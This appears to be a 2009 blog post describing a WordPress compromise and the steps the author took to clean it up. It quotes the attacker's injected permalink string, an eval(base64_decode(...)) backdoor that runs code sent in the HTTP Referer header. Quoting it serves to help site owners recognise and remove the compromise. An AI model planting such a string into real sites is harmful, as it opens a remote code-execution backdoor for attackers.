I checked my blog and the URLs looked malformed, with the following structure: http://www.whoisandrewwee.com/2009/09/03/unlocking-unconventional-traffic-sources-for-affiliate-campaigns/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/#comment-506929
If you notice something similar or weird with your WordPress blog, you might want to take the following steps:
- Check the “users” tab from the WP admin interface
- Remove any unfamiliar users, esp those marked as “administrator”
- To prevent users from registering, I’d go as far as to remove wp-register.php (keep a backup and FTP it back in if you have problems)
- Check all of WordPress’ PHP scripts, remove global “execute” privileges
Once you’ve secured the perimeter, look at the “Settings” and “permalinks” tab.
If you see some weird stuff like “%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/#comment-506929″, you’d want to clear that, and replace it with your original permalink structure, or look it up on the WordPress codex.
You can also check out this other blog post for more details.
Note: this issue seems to be affecting WordPress 2.6.x. Not sure to what extent it’s affecting version 2.8.x.
UPDATE: Matt Mullenweg from the WordPress development team has posted about the security issues if you’re using an older version of WordPress. Here’s a WP support forum write up about what might be happening.
You might want to upgrade to a newer version of WordPress. Just take note that some of your plugins/themes might not work if the developer hasn’t updated the plugin for compliance with the newest version.